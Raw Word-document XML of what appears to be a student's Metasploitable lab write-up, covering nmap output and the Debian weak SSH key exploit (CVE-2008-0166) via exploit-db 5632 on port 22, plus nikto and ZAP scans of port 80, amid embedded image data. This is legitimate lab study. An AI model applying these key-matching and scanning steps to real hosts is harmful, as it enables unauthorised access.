    <w:p w14:paraId="098DAE40" w14:textId="780EC287" w:rsidR="00A315C1" w:rsidRPr="00A315C1" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>a timeout the actual reporting of this vulnerability takes place in this VT instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C634C" w14:textId="34E63576" w:rsidR="00DB6252" w:rsidRDefault="00DB6252" w:rsidP="007A5D93"/>
    <w:p w14:paraId="24FC34F7" w14:textId="5DA65011" w:rsidR="00321109" w:rsidRDefault="00B867F4" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc155092364"/>
      <w:r>
        <w:t xml:space="preserve">Port 22 </w:t>
      </w:r>
      <w:r w:rsidR="00321109">
        <w:t>Exploiting Open SSH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="49A5E98A" w14:textId="0EA2B887" w:rsidR="00321109" w:rsidRDefault="00C4744C" w:rsidP="007A5D93">
      <w:r>
        <w:t>A lot of dead links found.</w:t>
      </w:r>
      <w:r w:rsidR="001E05FC">
        <w:t xml:space="preserve"> But did find the CVE-2008-0166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECBC4E" w14:textId="5DE6234A" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="007A5D93">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152C824" w14:textId="77777777" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t>22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4DF32" w14:textId="77777777" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t xml:space="preserve">| ssh-hostkey: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483845E" w14:textId="77777777" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t>|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40172977" w14:textId="6479BFB8" w:rsidR="00D80837" w:rsidRDefault="00D80837" w:rsidP="00D80837">
      <w:r>
        <w:t>|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A30AA4" w14:textId="75242175" w:rsidR="00C4744C" w:rsidRDefault="001E05FC" w:rsidP="001E05FC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C40579B" wp14:editId="0D544693">
            <wp:extent cx="4054475" cy="3072765"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="10623089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475" cy="3072765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A2B36" w14:textId="77777777" w:rsidR="00E7387F" w:rsidRDefault="00E7387F" w:rsidP="007A5D93"/>
    <w:p w14:paraId="17AF80D5" w14:textId="77777777" w:rsidR="00580FC9" w:rsidRDefault="00580FC9" w:rsidP="00D80D9B"/>
    <w:p w14:paraId="3C8F97ED" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">In this exploit, we will run a ruby script found at  https://www.exploit-db.com/exploits/5632/ debianssh/common_keys at master · g0tmi1k/debian-ssh (github.com)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC43749" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">The files required for this can be downloaded at wget --no-checkcertificate http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson12/562  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189E3B4" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">2.tar.bz2ls ruby ./5632.rb  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F157B9" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">192.168.254.186 root rsa/2048   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BEF3D4" w14:textId="77777777" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve">You will need the precalculated keys provided by HD Moore   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B4241" w14:textId="2FC72876" w:rsidR="00D80D9B" w:rsidRDefault="00D80D9B" w:rsidP="00D80D9B">
      <w:r>
        <w:t xml:space="preserve"># See http://metasploit.com/users/hdm/tools/debian-openssl/ - Dead link # for further information.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A5F95" w14:textId="1F7E9311" w:rsidR="000828E0" w:rsidRDefault="000828E0" w:rsidP="00D80D9B"/>
    <w:p w14:paraId="64998C94" w14:textId="585EABF7" w:rsidR="00D80D9B" w:rsidRDefault="000828E0" w:rsidP="00D80D9B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I found</w:t>
      </w:r>
      <w:r w:rsidR="0082504B">
        <w:t xml:space="preserve"> a different, source and </w:t>
      </w:r>
      <w:r w:rsidR="00D80D9B">
        <w:t xml:space="preserve">download the exploit 5622.tar.bz2 and extract and use the identified ruby script to process the keys.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A5FA3" w14:textId="6B12923E" w:rsidR="00D80D9B" w:rsidRDefault="0082504B" w:rsidP="00D80D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78229643" wp14:editId="2B335362">
            <wp:extent cx="5736590" cy="4139565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20428935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6590" cy="4139565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E7DBEB" w14:textId="18438C22" w:rsidR="00E20F61" w:rsidRDefault="00B65EFC" w:rsidP="00D80D9B">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00D316B5">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script found </w:t>
      </w:r>
      <w:r w:rsidR="00FA3977">
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matches also reported a number of errors.</w:t>
      </w:r>
      <w:r w:rsidR="00D70A3E">
        <w:t xml:space="preserve"> We will look at this later in the document once other exploits were executed</w:t>
      </w:r>
      <w:r w:rsidR="00FA3977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609551F8" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t xml:space="preserve">Lets look at whats going on with the keys run  cat /root/.ssh/authorized_keys   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7681F1" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E7878F" wp14:editId="314836D7">
            <wp:extent cx="5730875" cy="554990"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="121670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6C63D523" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t xml:space="preserve">If use grep  run that key against the extract keys I get a match  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF490B5" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t>grep -lr &lt;key&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6CB14B" wp14:editId="76DA6641">
            <wp:extent cx="5736590" cy="688975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="988905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5D60464B" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t>This is a match as the walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175A395" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t xml:space="preserve">But fails.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29115A08" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3391CDEA" wp14:editId="7B955F0C">
            <wp:extent cx="5731510" cy="1976930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="392145859" name="Picture 392145859"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9B7A2A6" w14:textId="77777777" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00E20F61">
      <w:r>
        <w:t xml:space="preserve">The last error did not expect because I would have expected the target to respond with its fingerprint The easy answer is to use ssh with this command: ssh oHostKeyAlgorithms=+ssh-dss msfadmin@192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CAE3E" w14:textId="1DA7E7D4" w:rsidR="00E20F61" w:rsidRDefault="00E20F61" w:rsidP="00D80D9B">
      <w:r>
        <w:t>I could regenerate the keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670220C7" w14:textId="34A10C86" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc155092365"/>
      <w:r>
        <w:t xml:space="preserve">Port 80  </w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B06E99" w14:textId="77777777" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="00D316B5">
      <w:r>
        <w:t xml:space="preserve">What’s running on port 80?   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A7998" w14:textId="318CB9A7" w:rsidR="002D6A4C" w:rsidRDefault="00BF4B2F" w:rsidP="00D316B5">
      <w:r>
        <w:t>Nokto -h 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E58F71" w14:textId="6F8C7F4F" w:rsidR="002D6A4C" w:rsidRDefault="002D6A4C" w:rsidP="00D316B5">
      <w:r w:rsidRPr="002D6A4C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BFCEA2A" wp14:editId="7C6A53E3">
            <wp:extent cx="5731510" cy="4460240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17621627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62731" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4460240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FCA89" w14:textId="77777777" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="00D316B5">
      <w:r>
        <w:t xml:space="preserve">Default website   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CCA71" w14:textId="26316AF6" w:rsidR="00B25B9B" w:rsidRDefault="00B25B9B" w:rsidP="00D316B5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stright away the page has credentials displayed on it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143333A" w14:textId="0EE2DF15" w:rsidR="00BB5E2C" w:rsidRDefault="00EF5DF7" w:rsidP="00BB5E2C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3094E552" wp14:editId="55390A29">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1416931</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1396595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2067114" cy="180867"/>
                <wp:effectExtent l="0" t="0" r="28575" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="455174904" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2067114" cy="180867"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:alpha val="0"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:ln>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39EDA6" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:111.55pt;margin-top:109.95pt;width:162.75pt;height:14.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" fillcolor="#ed7d31 [3205]" strokecolor="red" strokeweight="1pt">
                <v:fill opacity="0"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB5E2C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74DC22CF" wp14:editId="60D4872F">
            <wp:extent cx="2694940" cy="2542540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1911878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4940" cy="2542540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38439FB2" w14:textId="31D869E1" w:rsidR="005A6B1E" w:rsidRDefault="00D316B5" w:rsidP="008B708C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Here I ran zap </w:t>
      </w:r>
      <w:r w:rsidR="009337DE">
        <w:t>a zap scan.</w:t>
      </w:r>
      <w:r w:rsidR="002B73F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76932931" wp14:editId="06A02C73">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1487170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4991330" cy="7711967"/>
                <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="13982" name="Group 13982"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4991330" cy="7711967"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6656832" cy="8692897"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1437" name="Picture 1437"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="5739384" y="3081528"/>
                            <a:ext cx="45720" cy="198120"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1439" name="Picture 1439"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="5739384" y="3118104"/>
                            <a:ext cx="51816" cy="176784"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1440" name="Rectangle 1440"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5742449" y="3156539"/>
                            <a:ext cx="46619" cy="169633"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="508188F3"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1" name="Rectangle 1441"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5777492" y="3148598"/>
                            <a:ext cx="42144" cy="189937"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1D94D0C5"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3" name="Picture 1443"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="5775960" y="3112008"/>
                            <a:ext cx="48768" cy="195072"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1444" name="Rectangle 1444"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5777492" y="3148939"/>
                            <a:ext cx="46619" cy="169633"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="04A463C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wps:wsp>
                        <wps:cNvPr id="1445" name="Rectangle 1445"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5812578" y="3140998"/>
                            <a:ext cx="42144" cy="189937"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="336D6589" w14:textId="77777777" w:rsidR="002B73F5" w:rsidRDefault="002B73F5" w:rsidP="002B73F5">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447" name="Picture 1447"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6096" y="0"/>
                            <a:ext cx="5736336" cy="3194304"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1449" name="Picture 1449"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6096" y="3304032"/>
                            <a:ext cx="6650736" cy="1347216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1451" name="Picture 1451"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6096" y="4651248"/>
                            <a:ext cx="6650736" cy="1347216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1453" name="Picture 1453"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6096" y="5998464"/>
                            <a:ext cx="6650736" cy="1347216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1455" name="Picture 1455"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="7339585"/>
                            <a:ext cx="6641592" cy="135331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932931" id="Group 13982" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:117.1pt;width:393pt;height:607.25pt;z-index:251659264;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-relative:margin;mso-height-relative:margin" coordsize="66568,86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P/2VBLAwQKAAAAAAAA&#10;ACEAkTecYoMCAACDAgAAFAAAAGRycy9tZWRpYS9pbWFnZTMuanBn/9j/4AAQSkZJRgABAQEAYABg&#10;AAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMU&#10;FRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCABAAB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P/2VBL&#10;AwQKAAAAAAAAACEA4m7/Pb2TAQC9kwEAFAAAAGRycy9tZWRpYS9pbWFnZTQuanBn/9j/4AAQSkZJ&#10;RgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4R&#10;DgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAQYB1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0Cfs0f8AJuPwq/7FPSv/AEjir+fuv6BP2aP+TcfhV/2Kelf+kcVAH4k/tRf8nMfF&#10;v/scNV/9LZK8xr079qL/AJOY+Lf/AGOGq/8ApbJXmNABRRRQAUUUUAFFFFABRRRQAUUUUDCiiigQ&#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I/LT/nof+/lSeXRRWXs6Zj9XpBR5VFFaezRr7NBRRRTGFFFFABUXlVLRSsn&#10;uKye4UUUUWQw8qjyvKoooshWRF5dS+V5VFFZ+zRn7NB5VFFFaWQezQUUUUWRpZBRRRTGFReVUtFK&#10;ye4rJ7h5XlUUUUezRn7NBR5VFFBpYKKKKYwooooAPKooopWQvZrcKKKKY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6BP2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8Kv+xT&#10;0r/0jioA/En9qL/k5j4t/wDY4ar/AOlsleY16d+1F/ycx8W/+xw1X/0tkrzG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6B&#10;P2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8Kv+xT0r/0jioA/En9qL/k5j4t/wDY4ar/AOlsleY1&#10;6d+1F/ycx8W/+xw1X/0tkrzG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gT9mj/k3H4Vf9inpX/pHFX8/df0Cfs0f8m4/C&#10;r/sU9K/9I4qAPxJ/ai/5OY+Lf/Y4ar/6WyV5jXp37UX/ACcx8W/+xw1X/wBLZK8x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6BP2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8Kv&#10;+xT0r/0jioA/En9qL/k5j4t/9jhqv/pbJXmNenftRf8AJzHxb/7HDVf/AEtkrz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r+gT9mj/k3H4Vf9inpX/pHFX8&#10;/df0Cfs0f8m4/Cr/ALFPSv8A0jioA/En9qL/AJOY+Lf/AGOGq/8ApbJXmNenftRf8nMfFv8A7HDV&#10;f/S2SvM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QUUUUD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oE/Zo/5Nx+FX/Yp6V/6RxV/P3X9An7NH/JuP&#10;wq/7FPSv/SOKgD8Sf2ov+TmPi3/2OGq/+lsleY16d+1F/wAnMfFv/scNV/8AS2SvM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6BP2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8Kv+xT0&#10;r/0jioA/En9qL/k5j4t/9jhqv/pbJXmNenftRf8AJzHxb/7HDVf/AEtkrz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0f8Mv/GP/AKJH44/8Ju8/+N0UUAH/AAy/8Y/+iR+OP/CbvP8A43R/&#10;wy/8Y/8Aokfjj/wm7z/43RRQAf8ADL/xj/6JH44/8Ju8/wDjdH/DL/xj/wCiR+OP/CbvP/jdFFAB&#10;/wAMv/GP/okfjj/wm7z/AON1+5H7Oelz6H+z38MNN1HTri11Cz8L6Xb3MF1b4ljlS0iV1f8A2gQQ&#10;fcGiigD/2VBLAwQKAAAAAAAAACEAOgUAPvT2AAD09gAAFAAAAGRycy9tZWRpYS9pbWFnZTU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v+Pn&#10;7QHxQ8N/H74m6bpvxM8Y2On2/ijVLeO3t9fu447eOO8k8uOOPzP3cdcP/wANQfGP/ornjj/wpLz/&#10;AOOUv7UX/JzHxb/7HDVf/S2SvMa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9O/ai/5OY+Lf8A2OGq/wDpbJXmNenftRf8nMfFv/sc&#10;NV/9LZK8x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&#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">
                <v:shape id="Picture 1437" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:57393;top:30815;width:458;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">
